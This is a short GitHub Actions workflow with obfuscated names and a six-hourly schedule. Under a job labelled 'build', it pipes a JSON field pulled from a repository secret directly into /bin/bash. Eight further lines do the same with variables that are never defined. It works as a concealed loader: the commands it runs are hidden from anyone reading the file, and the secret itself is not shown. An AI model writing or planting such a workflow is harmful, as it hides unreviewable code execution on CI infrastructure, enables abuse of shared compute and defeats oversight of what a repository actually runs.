name: meiwucan8563
on:
  workflow_dispatch:
  schedule:
    - cron: '14 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: meiwucan8563
        env:
          l6: ${{ secrets.l6 }}
        run: |
          echo $l6 | jq -r .j46132 | /bin/bash
          echo $tpsbn6 | jq -r .pkuaa1 | /bin/bash
          echo $fq079 | jq -r .k2 | /bin/bash
          echo $pyiu87 | jq -r .ccvbw320 | /bin/bash
          echo $kd0 | jq -r .xmxwr018 | /bin/bash
          echo $bl30638 | jq -r .xoaq6909 | /bin/bash
          echo $q14526 | jq -r .lwc99 | /bin/bash
          echo $q370 | jq -r .ez1723 | /bin/bash
          echo $vt3 | jq -r .wcegu03 | /bin/bash

